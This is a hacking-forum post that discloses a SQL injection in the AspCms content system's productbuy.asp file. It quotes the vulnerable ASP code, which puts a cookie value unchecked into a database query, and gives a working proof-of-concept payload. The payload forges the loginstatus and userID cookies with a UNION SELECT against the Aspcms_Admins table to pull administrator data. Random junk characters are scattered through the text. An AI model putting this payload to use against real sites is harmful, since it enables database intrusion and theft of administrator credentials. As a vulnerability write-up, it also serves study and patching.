好久没上土司了,上来一看发现在删号名单内..... O; e9 O% o7 Q4 t) T
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
' X3 `* R4 ]& J$ w' u" M废话不多说,看代码:
! N2 ` c2 o/ s3 I# V
7 B' n/ `+ R# y& b c$ e& [<%- i' F B: f2 B# g0 u. K
. L& ~$ E% ~7 C2 ~" mif action = "buy" then. ^, O; c0 \9 X) s) f
. d) A, Y3 \- w9 V# o4 ?3 V addOrder()& l' |" Q0 B# t m& L8 S
4 z+ Y3 S' c: b: S# kelse& K* S3 A' Y$ G3 t( m0 w1 z
0 O' k, Z) y9 F5 i) @
echoContent()
0 r8 q- x1 @. _, |
& H5 e. X, V9 a( C2 ^3 x7 {9 C9 Bend if5 q8 D! a& h5 ?. Q; d
/ O* @- Q/ |2 R6 s, Z( t5 d
5 y( `) `/ D- t) B' D3 P) b+ D
7 J) N/ v1 P% P. o……略过
' ]6 m$ `" i3 T9 Z2 @$ H% |0 [, S T. X# a
% R" z& _. }: e) u' S% T, T! J) r$ ]) ?0 E: p5 L
Sub echoContent()
( q2 L% b7 p/ R& `9 `" G5 p/ J) H
8 L3 X0 a% B4 I dim id
( k& S Y% Y. i2 U
' t5 R" K& \/ e1 ~ id=getForm("id","get")
+ F4 |1 s2 r6 H$ q; O; y
2 \- u8 [1 _% Q* V7 P. C
3 b4 q) }" p, {1 v% d, |6 x5 G
/ G3 O2 t) @$ G( S# y if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
- h7 _1 t( f0 p3 A* n
; K H6 c; v. c" x 2 s( `. B" {. O! B, h
! ?& I" e" L' f0 n- n7 @
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")) w& B* _3 V( v) v
4 D+ C/ U. i4 Z' Q9 S9 C dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct1 p7 b9 U% D* C9 T& A
: E/ `8 z+ p+ T" w
Dim templatePath,tempStr
5 X( G. G" c0 r$ m, A5 _8 S
0 ?6 q( U3 v2 l( r% z$ } templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"6 r5 O, l- ^; l: A
4 b. L( a# |/ O
2 b, {: x2 i6 U0 @# V& q h7 Q+ h8 ^# H( O
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
1 S. }1 X9 r5 k
) u; p+ `0 b1 Q( p; j selectproduct=rsObj(0)+ X7 {7 `: b) r$ s9 v# r, q
7 F2 y' j- R6 d! c) S/ @
3 L% b; G1 Q6 \6 t) |: z3 J- r
6 ]6 o T! _- Y! Q) Y- v Dim linkman,gender,phone,mobile,email,qq,address,postcode
6 t! n8 A. m3 S9 ^4 d
0 L$ A& _' ~3 B( S if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
# e4 N; `# ]0 S
9 {1 ?7 P) Q) B) P# i if rCookie("loginstatus")=1 then
! S5 X, W' t! _1 O: J- p7 p! c% s+ n3 Q4 F6 [
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")7 m( `/ V9 e6 W
H0 n; ~' J( J& T( e linkman=rsObj("truename")
. C+ d% m- i- y2 R# ~. I1 j1 p9 {" z y S7 i1 P, B; d! R
gender=rsObj("gender")
9 B: z4 q6 T9 D b; }4 Q2 U2 F, h ~9 \8 L/ U5 i# Z! h
phone=rsObj("phone")% k4 ^" Y7 }0 v, k* c0 \
4 P4 O x9 R% ~9 x mobile=rsObj("mobile")
0 X: v" C8 N; Y3 a4 |
4 n5 o# S q/ o5 t7 p8 ~) J, z email=rsObj("email")# Y+ {3 _# T \ v( k6 u. s1 W) v
+ E5 z, v* h4 [) {& [ qq=rsObj("qq")
' w+ W7 c$ _# f. x' j O
. ~0 t- v, {4 @+ t' y* ?) q! j; P" L; o address=rsObj("address")& Q& J7 {- m$ G, u4 k0 Y
/ X; p: x! L) f postcode=rsObj("postcode")' B4 B1 C! y8 H8 ]) m
3 | U! A; \2 F$ [3 T
else
! i- T+ s; c4 H
+ m8 m/ C. {: e gender=18 p/ }1 h) ]$ {6 z% g
$ d. l2 N6 T W end if$ |) M+ J3 R1 H0 R$ e+ F2 b- x
" U$ }% H9 F) z4 B rsObj.close()4 |4 F8 `& C& q; ]% {' r
, b! o$ _, N( @" p: i7 R) q 0 u- E# T" k$ b e1 L9 X
% U# E. w; i( F& J; R- U6 J with templateObj
) {; l5 ?, r) n9 c
) Y$ j K% |2 h2 F0 g! r8 N .content=loadFile(templatePath) 8 w' X- E* L* S3 F; y5 x' @* b
: G- T. \7 D9 ]- a
.parseHtml()
: [- t+ Q& m6 I* ?! \& ]1 X9 B% _. X. v' X/ N: L7 y& C6 \
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct); ~+ Z, q# |4 y; }' b
0 B; X, C& w' x% E
.content=replaceStr(.content,"[aspcms:linkman]",linkman) * _* m* s, q2 `! a1 U, ~5 C
# X& N7 u0 K8 r5 \: c$ u. G
.content=replaceStr(.content,"[aspcms:gender]",gender)
9 L$ O/ H! ], P( n1 o& f+ e0 e" B, z n. X
.content=replaceStr(.content,"[aspcms:phone]",phone)
/ w( j& k6 {/ \5 |/ J9 N
8 o# K( }6 R$ F, z& W* c S- A .content=replaceStr(.content,"[aspcms:mobile]",mobile) & Q" s8 n, v5 c, u" [$ {
9 b: \7 x, y" _# M& ]8 ]7 H8 i1 G .content=replaceStr(.content,"[aspcms:email]",email)
6 ~* L/ W" l7 F6 |, C6 |2 w! ~& X- M% P5 [$ c& B
.content=replaceStr(.content,"[aspcms:qq]",qq) % x& A: [' `+ R% \3 }
% g8 i1 w& B) o; D, l* N .content=replaceStr(.content,"[aspcms:address]",address)
. z! |: [. J; m9 ]+ F. j* j% `. ^, R& [4 Q5 O. F3 f! G" f( n
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
# k! c! p& _ f' n) h
+ [* i( q( ^- @0 J8 @; Q" Z2 P7 y .parseCommon()
, W, Y; F+ Y- O' R0 I, J2 o: \, Q, g' W e- `9 x
echo .content
6 F8 w+ S7 ~7 Q/ D3 a- m7 l" _8 c% b& }
end with, s0 m& \6 ^$ C' s% H' J
6 H4 D d- _+ A
set templateobj =nothing : terminateAllObjects
9 V! v( Q0 s* ~% F$ m1 m9 s( T8 k: M" V8 z/ s \" y
End Sub
$ J1 U( ^% h$ e漏洞很明显,没啥好说的1 w1 C3 s1 Z, P- u
poc:
( @5 I, O& A+ o) i( ~; r# k! T0 u1 W+ U3 |) M
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
, B! c: W$ h. l* o
, q s5 M$ Z# X/ ^7 Q0 O' W! u |
发表于 2012-12-27 08:35:05
收藏
支持
反对